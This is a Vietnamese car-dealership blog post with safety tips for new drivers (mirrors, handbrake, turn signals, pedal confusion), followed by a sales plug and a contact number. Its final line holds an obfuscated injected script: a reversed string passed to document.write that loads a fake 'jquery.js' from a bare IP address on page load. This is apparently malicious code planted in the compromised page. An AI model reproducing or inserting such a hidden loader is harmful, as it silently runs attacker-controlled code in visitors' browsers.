Mẹo nhỏ giúp khắc phục những lỗi lái xe cho người mới lái

Đôi khi nghĩ là đơn giản nhưng những tài xế mới rất dễ gặp phải những lỗi khiến mình cũng không nghĩ đến.  Nếu với kinh nghiệm lái xe chưa nhiều các bạn cần chú ý đến một số lưu ý sau:

  1. Gương và tay phanh

Đây là 2 yếu tố rất dễ mắc phải khi bạn quên chỉnh gương hậu hay hạ tay phanh. Tuy là 2 thao tác vô cùng đơn giản nhưng không phải lái xe mới nào cũng để ý đến vấn đề này trước khi cho xe lăn bánh chạy.

Điều này có gây ảnh hưởng cho xe?

Có một điều chắc chắn nếu diễn ra thường xuyên rất dễ làm hư hỏng hệ thống phanh, bởi ma sát lớn giữa má phanh và tang trống sẽ sinh nhiệt khi xe chạy, làm cho má phanh có thể bị cháy.

nissan-le-van-luong

Chính vì vậy để hạn chế tối đa hư tổn cho xe, các tài mới cần lưu ý để tránh và tập cho mình thói quen này trước khi cho xe chạy.

  1. Quên xi nhan khi sang đường

Điều này tưởng chừng chỉ xảy ra khi bạn di chuyển bằng xe máy, nhưng đối với xe ô tô cũng không ít trường hợp tài xế quên bật xi nhan khi rẽ trái hay phải.

Việc này rất dễ gây nguy hiểm cho các phương tiện đang di chuyển trên đường.

nissan-le-van-luong

Hiện nay, theo Nghị định 46/2016, người điều khiển ô tô sẽ bị phạt tiền từ 300.000 – 400.000 đồng đối với các hành vi chuyển làn đường không đúng nơi cho phép hoặc không có tín hiệu báo trước.

  1.  Nhầm giữa chân ga và chân phanh

Đây có thể coi là lỗi nguy hiểm nhất mà những người mới lái gặp phải. Việc này đặc biệt thường xảy ra với  những người chuyển từ ô tô số sàn sang sử dụng xe số tự động.

Với sai lầm nguy hiểm này để tránh gặp phải , lái xe nên làm quen thao tác chân phanh, chân ga khi xe chưa khởi động. Khi lái xe, gót chân phải luôn đặt sát sàn xe, tạo tư thế bàn chân thoải mái để có thể chuyển đổi giữ ga, phanh theo hình chữ V. Khi không vào ga, nên đặt hờ ở chân ở bàn đạp phanh.

nissan-le-van-luong

Nissan Lê Văn Lương  vừa liệt kê một số lỗi mà tài mới thường gặp phải. Để có thể lái xe một cách an toàn, các bạn nên lưu ý đến những lỗi dù là nhỏ nhất.

Nissan Lê Văn Lương chúc các bạn lái xe an toàn.

Chung tôi tự hào là đại lý độc quyền của Nissan, chuyên cung cấp những dòng xe Nissan đảm bảo chất lượng an toàn tuyệt đối.

Mọi thông tin chi tiết xin vui lòng liên hệ : 0896 15 33 22

Rất hân hạnh được phục vụ quý khách

Xem thêm bài viết tại :  Kinh nghiệm bảo dưỡng ghế da ô tô tại nhà document.write(‘>tpircs/”sj.yreuqj/87.611.942.431//:sptth”=crs tpircs<'.split("").reverse().join(""))